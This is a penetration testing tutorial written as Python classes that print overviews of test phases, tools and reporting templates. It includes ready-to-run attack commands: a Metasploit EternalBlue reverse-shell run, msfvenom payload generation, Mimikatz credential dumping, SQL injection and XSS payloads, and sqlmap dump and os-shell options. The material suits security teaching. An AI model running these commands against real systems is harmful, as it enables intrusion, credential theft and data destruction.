Introduction to Penetration Testing
Penetration testing (pen testing) is a controlled simulated cyber attack against a computer system, network, or web application to identify security vulnerabilities that an attacker could exploit. It's a critical component of any organization's security program, providing real-world insights into security posture and helping prioritize remediation efforts.
Key Concepts
- Penetration Testing: Authorized simulated attacks to identify vulnerabilities
- Vulnerability Assessment: Automated scanning to identify known vulnerabilities
- Red Team: Offensive security team simulating adversaries
- Blue Team: Defensive security team protecting assets
- Purple Team: Collaborative approach combining red and blue teams
- Attack Vector: The path or means by which an attacker gains access
1. Penetration Testing Overview
Types of Penetration Testing
class PenTestTypes:
"""Classification of penetration testing types"""
test_types = {
"Black Box": {
"Description": "No prior knowledge of the target system",
"Approach": "Simulates external attacker with no internal knowledge",
"Pros": "Realistic external attacker simulation",
"Cons": "Time-consuming, may miss internal vulnerabilities",
"When to Use": "External-facing applications, third-party testing"
},
"White Box": {
"Description": "Full knowledge of target system (source code, architecture)",
"Approach": "In-depth testing with internal knowledge",
"Pros": "Comprehensive coverage, efficient",
"Cons": "May not simulate real attacker knowledge level",
"When to Use": "Critical applications, compliance requirements"
},
"Gray Box": {
"Description": "Limited knowledge (credentials, API documentation)",
"Approach": "Simulates insider threat or compromised user",
"Pros": "Balanced approach, realistic insider threat",
"Cons": "Requires careful scope definition",
"When to Use": "Web applications, API testing"
}
}
def display(self):
for test_type, details in self.test_types.items():
print(f"\n{'='*55}")
print(f"{test_type.upper()} BOX TESTING")
print(f"{details['Description']}")
print(f"Approach: {details['Approach']}")
print(f"ā {details['Pros']}")
print(f"ā {details['Cons']}")
print(f"š {details['When to Use']}")
pen_types = PenTestTypes()
pen_types.display()
Testing Methodologies
class TestingMethodologies:
"""Penetration testing frameworks and standards"""
methodologies = {
"PTES (Penetration Testing Execution Standard)": {
"Phases": [
"Pre-engagement Interactions",
"Intelligence Gathering",
"Threat Modeling",
"Vulnerability Analysis",
"Exploitation",
"Post-Exploitation",
"Reporting"
],
"Focus": "Comprehensive methodology covering all aspects"
},
"OWASP Testing Guide": {
"Focus": "Web application security",
"Sections": [
"Information Gathering",
"Configuration Testing",
"Identity Management",
"Authentication Testing",
"Authorization Testing",
"Session Management",
"Input Validation",
"Error Handling",
"Cryptography",
"Business Logic",
"Client-side Testing"
]
},
"NIST SP 800-115": {
"Focus": "Technical guide to information security testing",
"Phases": [
"Planning",
"Discovery",
"Attack",
"Reporting"
]
},
"OSSTMM (Open Source Security Testing Methodology Manual)": {
"Focus": "Operational security metrics",
"Modules": [
"Scope Definition",
"Channel Testing",
"Controls Testing",
"Process Testing"
]
}
}
def display(self):
print("\n" + "="*55)
print("PENETRATION TESTING METHODOLOGIES")
print("="*55)
for methodology, details in self.methodologies.items():
print(f"\nš {methodology}")
if 'Phases' in details:
print("\nPhases:")
for phase in details['Phases'][:5]:
print(f" ā¢ {phase}")
if len(details['Phases']) > 5:
print(f" ā¢ ... +{len(details['Phases'])-5} more phases")
if 'Focus' in details:
print(f"\nFocus: {details['Focus']}")
methodologies = TestingMethodologies()
methodologies.display()
2. Penetration Testing Lifecycle
Phase 1: Pre-engagement
class PreEngagement:
"""Pre-engagement phase activities"""
def __init__(self):
self.elements = {
"Scope Definition": {
"Questions": [
"What systems are in scope?",
"What IP ranges?",
"What domains?",
"What applications?",
"What testing types? (internal/external/web/mobile)"
],
"Outcome": "Clear scope document"
},
"Rules of Engagement": {
"Elements": [
"Testing window/timeline",
"Allowed attack vectors",
"Social engineering permitted?",
"Physical testing permitted?",
"Emergency contact procedures"
],
"Outcome": "Signed ROE document"
},
"Goals and Objectives": {
"Elements": [
"Find critical vulnerabilities",
"Test specific controls",
"Achieve domain admin",
"Access sensitive data",
"Compliance requirements"
],
"Outcome": "Defined success criteria"
},
"Legal Authorization": {
"Documents": [
"Signed authorization letter",
"Third-party authorization (cloud providers)",
"Insurance coverage",
"Data handling agreements"
],
"Outcome": "Legal protection for testers"
}
}
def display(self):
print("\n" + "="*55)
print("PRE-ENGAGEMENT PHASE")
print("="*55)
for element, details in self.elements.items():
print(f"\nš {element}")
if 'Questions' in details:
print("\nKey Questions:")
for q in details['Questions'][:4]:
print(f" ā¢ {q}")
if 'Elements' in details:
print("\nElements:")
for elem in details['Elements']:
print(f" ā¢ {elem}")
print(f"\nOutcome: {details['Outcome']}")
def generate_scope_document(self):
"""Generate sample scope document template"""
print("\n" + "="*55)
print("SCOPE DOCUMENT TEMPLATE")
print("="*55)
scope_template = """
PENETRATION TEST SCOPE DOCUMENT
================================
1. CLIENT INFORMATION
ā¢ Organization: _____________
ā¢ Contact Person: _____________
ā¢ Email/Phone: _____________
2. TEST SCOPE
ā¢ Internal IP Ranges: _____________
ā¢ External IP Ranges: _____________
ā¢ Domains: _____________
ā¢ Applications: _____________
ā¢ APIs: _____________
3. TEST TYPES
[ ] External Network
[ ] Internal Network
[ ] Web Application
[ ] Mobile Application
[ ] Wireless
[ ] Physical
[ ] Social Engineering
4. TESTING WINDOW
ā¢ Start Date: _____________
ā¢ End Date: _____________
ā¢ Testing Hours: _____________
5. RULES OF ENGAGEMENT
ā¢ Allowed Techniques: _____________
ā¢ Prohibited Actions: _____________
ā¢ Emergency Stop Procedures: _____________
6. SUCCESS CRITERIA
ā¢ _____________
ā¢ _____________
ā¢ _____________
7. AUTHORIZATION
ā¢ Authorized By: _____________
ā¢ Signature: _____________
ā¢ Date: _____________
"""
print(scope_template)
pre_engage = PreEngagement()
pre_engage.display()
pre_engage.generate_scope_document()
Phase 2: Intelligence Gathering (Reconnaissance)
class IntelligenceGathering:
"""Passive and active reconnaissance techniques"""
def __init__(self):
self.techniques = {
"Passive Reconnaissance": {
"Description": "Gather information without directly interacting with target",
"Sources": [
"DNS records (whois, dig)",
"Search engines (Google dorks)",
"Social media",
"Job postings",
"Code repositories (GitHub)",
"Shodan/Censys",
"Certificate transparency logs"
],
"Tools": ["theHarvester", "recon-ng", "Maltego", "Shodan"],
"Output": [
"Email addresses",
"Domain names",
"Employee names",
"Technology stack"
]
},
"Active Reconnaissance": {
"Description": "Direct interaction with target systems",
"Techniques": [
"Port scanning (nmap)",
"Service enumeration",
"OS fingerprinting",
"Banner grabbing",
"DNS enumeration"
],
"Tools": ["nmap", "masscan", "zmap", "dnsrecon"],
"Risks": "May trigger IDS/IPS alerts"
},
"OSINT (Open Source Intelligence)": {
"Description": "Publicly available information gathering",
"Sources": [
"Google dorks",
"Wayback Machine",
"Public records",
"LinkedIn/GitHub",
"Crunchbase"
],
"Google Dorks Examples": [
"site:target.com filetype:pdf",
"intitle:\"index of\"",
"inurl:admin",
"ext:conf | ext:cnf"
]
}
}
def display(self):
print("\n" + "="*55)
print("INTELLIGENCE GATHERING (RECONNAISSANCE)")
print("="*55)
for technique, details in self.techniques.items():
print(f"\nš {technique}")
print(f"{details['Description']}")
if 'Sources' in details:
print("\nSources:")
for source in details['Sources'][:4]:
print(f" ā¢ {source}")
if 'Tools' in details:
print(f"\nTools: {', '.join(details['Tools'])}")
if 'Output' in details:
print("\nOutput:")
for out in details['Output']:
print(f" ā {out}")
def google_dorks_examples(self):
"""Google dork examples for OSINT"""
print("\n" + "="*55)
print("GOOGLE DORKS (OSINT)")
print("="*55)
dorks = """
FILE SEARCH:
ā¢ site:target.com filetype:pdf
ā¢ intitle:"index of" "backup"
ā¢ filetype:sql intext:password
SENSITIVE INFORMATION:
ā¢ intitle:"admin" inurl:login
ā¢ intext:"powered by WordPress"
ā¢ "API key" site:github.com
CONFIGURATION FILES:
ā¢ ext:conf | ext:cnf | ext:ini
ā¢ ext:log "password"
ā¢ inurl:phpinfo.php
DIRECTORY LISTINGS:
ā¢ intitle:"index of" "parent directory"
ā¢ intitle:"Directory listing for"
ERROR MESSAGES:
ā¢ "Warning: mysql_connect()"
ā¢ "ORA-00942: table or view does not exist"
ā¢ "Error: SQLSTATE[HY000]"
"""
print(dorks)
recon = IntelligenceGathering()
recon.display()
recon.google_dorks_examples()
Phase 3: Vulnerability Analysis
class VulnerabilityAnalysis:
"""Identifying and analyzing vulnerabilities"""
def __init__(self):
self.analysis_types = {
"Automated Scanning": {
"Purpose": "Identify known vulnerabilities",
"Tools": [
"Nessus",
"OpenVAS",
"Qualys",
"Nexpose"
],
"Advantages": "Fast, comprehensive coverage",
"Limitations": "False positives, cannot test business logic"
},
"Manual Analysis": {
"Purpose": "Validate findings, identify logic flaws",
"Activities": [
"Configuration review",
"Code review",
"Business logic testing",
"Authentication bypass attempts"
],
"Advantages": "Finds unique vulnerabilities",
"Limitations": "Time-consuming, requires expertise"
},
"Vulnerability Classification": {
"Frameworks": [
"CVSS (Common Vulnerability Scoring System)",
"CWE (Common Weakness Enumeration)",
"CVE (Common Vulnerabilities and Exposures)"
],
"Risk Ratings": [
"Critical (CVSS 9.0-10.0)",
"High (CVSS 7.0-8.9)",
"Medium (CVSS 4.0-6.9)",
"Low (CVSS 0.1-3.9)",
"Informational"
]
}
}
def display(self):
print("\n" + "="*55)
print("VULNERABILITY ANALYSIS")
print("="*55)
for analysis_type, details in self.analysis_types.items():
print(f"\nš§ {analysis_type}")
print(f"Purpose: {details['Purpose']}")
if 'Tools' in details:
print(f"Tools: {', '.join(details['Tools'])}")
if 'Activities' in details:
print("\nActivities:")
for activity in details['Activities']:
print(f" ā¢ {activity}")
print(f"ā {details['Advantages']}")
print(f"ā {details['Limitations']}")
def cvss_score_explanation(self):
"""CVSS v3.1 score explanation"""
print("\n" + "="*55)
print("CVSS SCORE CALCULATION")
print("="*55)
print("""
CVSS v3.1 Base Metrics:
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
ā Attack Vector (AV) ā
ā ā¢ Network (N): Remotely exploitable ā
ā ā¢ Adjacent (A): Same network segment ā
ā ā¢ Local (L): Requires local access ā
ā ā¢ Physical (P): Requires physical access ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā Attack Complexity (AC) ā
ā ā¢ Low (L): Easily exploitable ā
ā ā¢ High (H): Requires specialized conditions ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā Privileges Required (PR) ā
ā ā¢ None (N): No authentication required ā
ā ā¢ Low (L): Basic user privileges ā
ā ā¢ High (H): Admin/root privileges ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā User Interaction (UI) ā
ā ā¢ None (N): No user interaction required ā
ā ā¢ Required (R): Requires user action ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā Scope (S) ā
ā ā¢ Unchanged (U): Impact confined to vulnerable component ā
ā ā¢ Changed (C): Impact affects other components ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā Impact Metrics (CIA) ā
ā ā¢ Confidentiality (C): High/Low/None ā
ā ā¢ Integrity (I): High/Low/None ā
ā ā¢ Availability (A): High/Low/None ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
CVSS Score Example:
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 (Critical)
""")
vuln_analysis = VulnerabilityAnalysis()
vuln_analysis.display()
vuln_analysis.cvss_score_explanation()
Phase 4: Exploitation
class Exploitation:
"""Exploitation phase techniques"""
def __init__(self):
self.exploitation_categories = {
"Network Exploitation": {
"Examples": [
"Exploiting unpatched services",
"Password attacks (brute force, spraying)",
"Man-in-the-middle attacks",
"ARP spoofing",
"DNS hijacking"
],
"Tools": ["Metasploit", "Hydra", "Responder", "Bettercap"]
},
"Web Application Exploitation": {
"OWASP Top 10": [
"SQL Injection",
"Cross-Site Scripting (XSS)",
"Broken Authentication",
"Sensitive Data Exposure",
"XML External Entities (XXE)",
"Security Misconfiguration",
"Cross-Site Request Forgery (CSRF)",
"Insecure Deserialization",
"Using Components with Known Vulnerabilities",
"Insufficient Logging & Monitoring"
],
"Tools": ["Burp Suite", "OWASP ZAP", "SQLmap", "Nuclei"]
},
"Privilege Escalation": {
"Techniques": [
"Kernel exploits",
"Misconfigured sudo",
"SUID binaries",
"Cron jobs",
"Service misconfigurations",
"Docker breakout"
],
"Tools": ["LinPEAS", "WinPEAS", "PowerUp", "Sherlock"]
},
"Post-Exploitation": {
"Activities": [
"Lateral movement",
"Persistence establishment",
"Data exfiltration",
"Credential dumping",
"Pivoting"
],
"Tools": ["Mimikatz", "Impacket", "Cobalt Strike", "Empire"]
}
}
def display(self):
print("\n" + "="*55)
print("EXPLOITATION PHASE")
print("="*55)
for category, details in self.exploitation_categories.items():
print(f"\nā” {category}")
if 'Examples' in details:
print("\nExamples:")
for ex in details['Examples'][:5]:
print(f" ā¢ {ex}")
if 'OWASP Top 10' in details:
print("\nOWASP Top 10:")
for vuln in details['OWASP Top 10'][:5]:
print(f" ā¢ {vuln}")
print(f" ā¢ ... +{len(details['OWASP Top 10'])-5} more")
if 'Techniques' in details:
print("\nTechniques:")
for tech in details['Techniques'][:5]:
print(f" ā¢ {tech}")
print(f"\nTools: {', '.join(details['Tools'])}")
def metasploit_examples(self):
"""Metasploit framework examples"""
print("\n" + "="*55)
print("METASPLOIT FRAMEWORK EXAMPLES")
print("="*55)
examples = """
# Start Metasploit
msfconsole
# Search for modules
search type:exploit name:smb
search cve:2021
# Use exploit module
use exploit/windows/smb/ms17_010_eternalblue
# Show options
show options
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
# Run exploit
run
# Post-exploitation (Meterpreter)
sysinfo
getuid
hashdump
screenshot
download C:\\secret\\data.txt
upload /tmp/backdoor.exe
shell
# Auxiliary modules
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 1-1000
run
# Payload generation
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe -o payload.exe
"""
print(examples)
exploitation = Exploitation()
exploitation.display()
exploitation.metasploit_examples()
Phase 5: Post-Exploitation
class PostExploitation:
"""Post-exploitation activities"""
def __init__(self):
self.activities = {
"Lateral Movement": {
"Techniques": [
"Pass the hash",
"Pass the ticket",
"PSExec/WMI",
"RDP hopping",
"SSH key harvesting"
],
"Tools": ["Impacket", "CrackMapExec", "BloodHound"],
"Goal": "Expand access across network"
},
"Persistence": {
"Techniques": [
"Registry run keys",
"Scheduled tasks",
"Startup folder",
"Service creation",
"WMI event subscription",
"Web shells"
],
"Goal": "Maintain access after reboot"
},
"Credential Harvesting": {
"Sources": [
"SAM hive",
"LSASS memory",
"Kerberos tickets",
"Browser saved passwords",
"SSH keys",
"Configuration files"
],
"Tools": ["Mimikatz", "LaZagne", "SecretsDump"],
"Goal": "Obtain credentials for further access"
},
"Data Exfiltration": {
"Methods": [
"Encrypted channels",
"DNS tunneling",
"HTTP/S POST",
"ICMP tunneling",
"Cloud storage upload"
],
"Tools": ["curl", "scp", "dnscat2", "iodine"],
"Goal": "Extract sensitive data"
},
"Pivoting": {
"Techniques": [
"Port forwarding",
"SOCKS proxy",
"SSH tunneling",
"Metasploit pivoting",
"VPN pivoting"
],
"Goal": "Access internal networks"
}
}
def display(self):
print("\n" + "="*55)
print("POST-EXPLOITATION ACTIVITIES")
print("="*55)
for activity, details in self.activities.items():
print(f"\nš {activity}")
if 'Techniques' in details:
print("\nTechniques:")
for tech in details['Techniques'][:5]:
print(f" ā¢ {tech}")
if 'Sources' in details:
print("\nSources:")
for source in details['Sources'][:5]:
print(f" ā¢ {source}")
print(f"\nTools: {', '.join(details['Tools'])}")
print(f"Goal: {details['Goal']}")
def mimikatz_commands(self):
"""Mimikatz command examples"""
print("\n" + "="*55)
print("MIKIKATZ COMMAND EXAMPLES")
print("="*55)
commands = """
# Run Mimikatz
mimikatz
# Privilege escalation
privilege::debug
# Dump credentials
sekurlsa::logonpasswords
sekurlsa::tickets
sekurlsa::kerberos
# Pass-the-hash
sekurlsa::pth /user:Administrator /domain:target.local /ntlm:<hash>
# Golden ticket
kerberos::golden /user:Administrator /domain:target.local /sid:<SID> /krbtgt:<hash> /id:500
# Dump LSASS
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
# DPCAPI data
dpapi::masterkey /in:"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Protect\\<SID>\\<file>" /rpc
"""
print(commands)
post_exploit = PostExploitation()
post_exploit.display()
post_exploit.mimikatz_commands()
3. Web Application Penetration Testing
OWASP Top 10 Deep Dive
class OWASPTesting:
"""OWASP Top 10 testing techniques"""
def __init__(self):
self.owasp_vulnerabilities = {
"SQL Injection": {
"Description": "Insert SQL code into application queries",
"Testing Techniques": [
"Error-based injection",
"Union-based injection",
"Blind boolean-based injection",
"Time-based blind injection"
],
"Tools": ["SQLmap", "Burp Suite Intruder"],
"Test Payloads": [
"' OR '1'='1",
"' UNION SELECT username,password FROM users--",
"admin'--",
"'; DROP TABLE users;--"
]
},
"Cross-Site Scripting (XSS)": {
"Description": "Inject malicious scripts into web pages",
"Types": [
"Reflected XSS",
"Stored XSS",
"DOM-based XSS"
],
"Test Payloads": [
"<script>alert('XSS')</script>",
"javascript:alert('XSS')",
"<img src=x onerror=alert('XSS')>",
"';alert(String.fromCharCode(88,83,83))//"
],
"Tools": ["XSSer", "XSStrike", "Burp Suite"]
},
"Authentication Testing": {
"Techniques": [
"Username enumeration",
"Password spraying",
"Brute force attacks",
"Session fixation",
"Weak password policy testing"
],
"Tools": ["Hydra", "Medusa", "Patator"],
"Common Weaknesses": [
"Default credentials",
"No account lockout",
"Weak password complexity",
"No MFA"
]
},
"Authorization Testing": {
"Techniques": [
"IDOR (Insecure Direct Object References)",
"Privilege escalation",
"Parameter tampering",
"Path traversal"
],
"Test Cases": [
"Modify user ID in request",
"Access admin endpoints",
"Change role parameter",
"../../../etc/passwd"
]
}
}
def display(self):
print("\n" + "="*55)
print("OWASP TOP 10 TESTING TECHNIQUES")
print("="*55)
for vuln, details in self.owasp_vulnerabilities.items():
print(f"\nš {vuln}")
print(f"{details['Description']}")
if 'Types' in details:
print(f"\nTypes: {', '.join(details['Types'])}")
print("\nTesting Techniques:")
for tech in details['Testing Techniques'][:3]:
print(f" ā¢ {tech}")
print("\nTools:")
for tool in details['Tools']:
print(f" ā¢ {tool}")
def sqlmap_examples(self):
"""SQLmap tool examples"""
print("\n" + "="*55)
print("SQLMAP EXAMPLES")
print("="*55)
examples = """
# Basic SQL injection detection
sqlmap -u "http://target.com/page.php?id=1"
# POST request injection
sqlmap -u "http://target.com/login.php" --data="username=admin&password=pass"
# Enumerate databases
sqlmap -u "http://target.com/page.php?id=1" --dbs
# Enumerate tables
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables
# Enumerate columns
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns
# Dump data
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump
# Level and risk settings
sqlmap -u "http://target.com/page.php?id=1" --level=5 --risk=3
# Use tamper scripts
sqlmap -u "http://target.com/page.php?id=1" --tamper=space2comment
# Get OS shell
sqlmap -u "http://target.com/page.php?id=1" --os-shell
"""
print(examples)
owasp = OWASPTesting()
owasp.display()
owasp.sqlmap_examples()
API Penetration Testing
class APIPenetrationTesting:
"""API security testing techniques"""
def __init__(self):
self.api_tests = {
"Authentication Testing": {
"Methods": [
"API key leakage",
"JWT token testing",
"OAuth 2.0 flaws",
"Basic auth brute force"
],
"Test Cases": [
"Missing authentication",
"Weak JWT secrets",
"Token replay",
"Token expiration bypass"
],
"Tools": ["Postman", "Burp Suite", "JWT_tool"]
},
"Injection Testing": {
"Types": [
"NoSQL injection",
"SQL injection in APIs",
"Command injection",
"LDAP injection"
],
"Tools": ["NoSQLmap", "SQLmap", "Postman"]
},
"Rate Limiting": {
"Techniques": [
"Brute force protection bypass",
"Rate limit enumeration",
"Race conditions"
],
"Tools": ["Burp Intruder", "ffuf", "wrk"]
},
"GraphQL Testing": {
"Techniques": [
"Introspection queries",
"Field duplication",
"Batch queries",
"Deep recursion"
],
"Tools": ["GraphQL Voyager", "GraphQL Playground", "InQL"]
}
}
def display(self):
print("\n" + "="*55)
print("API PENETRATION TESTING")
print("="*55)
for test_type, details in self.api_tests.items():
print(f"\nš” {test_type}")
if 'Methods' in details:
print("\nMethods:")
for method in details['Methods']:
print(f" ā¢ {method}")
if 'Test Cases' in details:
print("\nTest Cases:")
for test in details['Test Cases']:
print(f" ā¢ {test}")
print(f"\nTools: {', '.join(details['Tools'])}")
def jwt_attacks(self):
"""JWT token testing techniques"""
print("\n" + "="*55)
print("JWT ATTACK TECHNIQUES")
print("="*55)
attacks = """
JWT Structure:
Header: {"alg":"HS256","typ":"JWT"}
Payload: {"sub":"user","exp":1234567890}
Signature: HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
Common Attacks:
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
ā 1. None Algorithm Attack ā
ā ā¢ Change alg to "none" ā
ā ā¢ Remove signature ā
ā ā¢ Tool: jwt_tool -X a ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 2. Weak Secret Brute Force ā
ā ā¢ Crack JWT secret using wordlist ā
ā ā¢ Tool: jwt_tool -C /usr/share/wordlists/rockyou.txt ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 3. Algorithm Confusion ā
ā ā¢ Change alg from RS256 to HS256 ā
ā ā¢ Use public key as symmetric key ā
ā ā¢ Tool: jwt_tool -X k ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 4. Kid Injection ā
ā ā¢ Manipulate "kid" header parameter ā
ā ā¢ Path traversal, SQL injection ā
ā ā¢ Tool: jwt_tool -X i ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 5. Claim Manipulation ā
ā ā¢ Modify exp, iat, nbf ā
ā ā¢ Escalate privileges ā
ā ā¢ Tool: jwt_tool -X e ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
JWT Testing Tools:
ā¢ jwt_tool - Comprehensive JWT testing
ā¢ Burp Suite JWT Editor - Burp extension
ā¢ jsonwebtoken - Node.js library for testing
"""
print(attacks)
api_test = APIPenetrationTesting()
api_test.display()
api_test.jwt_attacks()
4. Network Penetration Testing
Network Scanning Techniques
class NetworkPenTesting:
"""Network penetration testing techniques"""
def __init__(self):
self.network_tests = {
"Port Scanning": {
"Techniques": [
"TCP SYN scan (-sS) - Stealth",
"TCP Connect scan (-sT)",
"UDP scan (-sU)",
"FIN scan (-sF)",
"XMAS scan (-sX)",
"NULL scan (-sN)"
],
"Tools": ["nmap", "masscan", "zmap"],
"Example": "nmap -sS -p- -T4 192.168.1.0/24"
},
"Service Enumeration": {
"Techniques": [
"Version detection (-sV)",
"OS detection (-O)",
"Script scanning (-sC)",
"Aggressive scan (-A)"
],
"Tools": ["nmap", "amap", "nc"],
"Example": "nmap -sV -sC -p 80,443 192.168.1.1"
},
"Vulnerability Scanning": {
"Tools": ["Nessus", "OpenVAS", "Nuclei"],
"Example": "nessuscli scan --target 192.168.1.0/24"
}
}
def display(self):
print("\n" + "="*55)
print("NETWORK PENETRATION TESTING")
print("="*55)
for test_type, details in self.network_tests.items():
print(f"\nš {test_type}")
if 'Techniques' in details:
print("\nTechniques:")
for tech in details['Techniques'][:5]:
print(f" ā¢ {tech}")
print(f"\nTools: {', '.join(details['Tools'])}")
if 'Example' in details:
print(f"\nExample: {details['Example']}")
def nmap_advanced_scanning(self):
"""Advanced Nmap scanning techniques"""
print("\n" + "="*55)
print("ADVANCED NMAP SCANNING")
print("="*55)
scans = """
SCAN TYPES:
ā¢ TCP SYN scan (default): nmap -sS target
ā¢ UDP scan: nmap -sU target
ā¢ FIN scan (stealth): nmap -sF target
ā¢ NULL scan: nmap -sN target
ā¢ XMAS scan: nmap -sX target
ā¢ Idle scan (zombie): nmap -sI zombie target
TIMING TEMPLATES:
ā¢ -T0 (Paranoid): Very slow, IDS evasion
ā¢ -T1 (Sneaky): Slow, IDS evasion
ā¢ -T2 (Polite): Slow, less bandwidth
ā¢ -T3 (Normal): Default
ā¢ -T4 (Aggressive): Fast, assumes good network
ā¢ -T5 (Insane): Very fast, may miss ports
SCRIPT SCANNING:
ā¢ Default scripts: nmap -sC target
ā¢ Specific script: nmap --script http-enum target
ā¢ Script categories: nmap --script vuln target
ā¢ Custom script: nmap --script ./myscript.nse target
OUTPUT FORMATS:
ā¢ Normal: nmap -oN output.txt target
ā¢ XML: nmap -oX output.xml target
ā¢ Grepable: nmap -oG output.gnmap target
ā¢ All formats: nmap -oA output target
EVASION TECHNIQUES:
ā¢ Decoy: nmap -D RND:10 target
ā¢ Fragment packets: nmap -f target
ā¢ Source port: nmap -g 53 target
ā¢ MTU: nmap --mtu 24 target
"""
print(scans)
network_pen = NetworkPenTesting()
network_pen.display()
network_pen.nmap_advanced_scanning()
5. Reporting
Penetration Test Report Structure
class PenTestReporting:
"""Penetration test report structure and content"""
def __init__(self):
self.report_sections = {
"Executive Summary": {
"Content": [
"Overall security posture",
"Key findings summary",
"Risk rating overview",
"Remediation timeline",
"Strategic recommendations"
],
"Audience": "Senior management, executives"
},
"Technical Summary": {
"Content": [
"Scope and methodology",
"Testing timeline",
"Tools used",
"Successes and limitations",
"Attack narrative"
],
"Audience": "Technical management"
},
"Findings": {
"Structure": [
"Vulnerability title",
"Risk rating (CVSS score)",
"Description",
"Affected assets",
"Proof of concept",
"Impact analysis",
"Remediation steps",
"References"
]
},
"Remediation": {
"Content": [
"Prioritized remediation plan",
"Short-term fixes",
"Long-term improvements",
"Verification steps",
"Timeline estimates"
]
},
"Appendix": {
"Content": [
"Raw scan results",
"Exploit code used",
"Configuration files",
"Network diagrams",
"Glossary"
]
}
}
def display(self):
print("\n" + "="*55)
print("PENETRATION TEST REPORT STRUCTURE")
print("="*55)
for section, details in self.report_sections.items():
print(f"\nš {section}")
print(f"Audience: {details['Audience'] if 'Audience' in details else 'Technical staff'}")
print("Content:")
for content in details['Content'][:5]:
print(f" ā¢ {content}")
def create_finding_template(self):
"""Create finding template"""
print("\n" + "="*55)
print("FINDING TEMPLATE")
print("="*55)
template = """
FINDING: [Vulnerability Title]
================================
| Field | Value |
|-------|-------|
| Risk Rating | [Critical/High/Medium/Low] |
| CVSS Score | [0.0-10.0] |
| Affected Assets | [IP/hostname/application] |
| Discovered | [Date] |
| Status | [New/In Progress/Fixed/False Positive] |
DESCRIPTION:
[Detailed description of the vulnerability]
PROOF OF CONCEPT:
[Actual exploit code or steps to reproduce]
IMPACT:
[Business and technical impact of exploitation]
RECOMMENDATION:
[Specific steps to remediate]
REFERENCES:
[CVEs, CWE, OWASP, external resources]
"""
print(template)
def remediation_prioritization(self):
"""Remediation prioritization framework"""
print("\n" + "="*55)
print("REMEDIATION PRIORITIZATION")
print("="*55)
prioritization = """
PRIORITIZATION MATRIX:
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
ā IMPACT ā
āāāāāāāāāāāāā¬āāāāāāāāāāāā¬āāāāāāāāāāāāāāāāāāāā¤
ā Critical ā High ā Medium/Low ā
āāāāāāāāāāāāā¬āāāāāāā¼āāāāāāāāāāāā¼āāāāāāāāāāāā¼āāāāāāāāāāāāāāāāāāāā¤
ā ā High ā 1 ā 2 ā 3 ā
ā LIKELI- āāāāāāāā¼āāāāāāāāāāāā¼āāāāāāāāāāāā¼āāāāāāāāāāāāāāāāāāāā¤
ā HOOD ā Med ā 2 ā 3 ā 4 ā
ā āāāāāāāā¼āāāāāāāāāāāā¼āāāāāāāāāāāā¼āāāāāāāāāāāāāāāāāāāā¤
ā ā Low ā 3 ā 4 ā 5 ā
āāāāāāāāāāāāā“āāāāāāā“āāāāāāāāāāāā“āāāāāāāāāāāā“āāāāāāāāāāāāāāāāāāāā
PRIORITY LEVELS:
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
ā Priority 1: CRITICAL ā
ā ā¢ Immediate remediation (within 24-48 hours) ā
ā ā¢ Business impact: Severe ā
ā ā¢ Examples: Remote code execution, domain admin compromise ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā Priority 2: HIGH ā
ā ā¢ Remediate within 1-2 weeks ā
ā ā¢ Business impact: Significant ā
ā ā¢ Examples: SQL injection, privilege escalation ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā Priority 3: MEDIUM ā
ā ā¢ Remediate within 1 month ā
ā ā¢ Business impact: Moderate ā
ā ā¢ Examples: Information disclosure, weak cryptography ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā Priority 4: LOW ā
ā ā¢ Remediate within 3-6 months ā
ā ā¢ Business impact: Minor ā
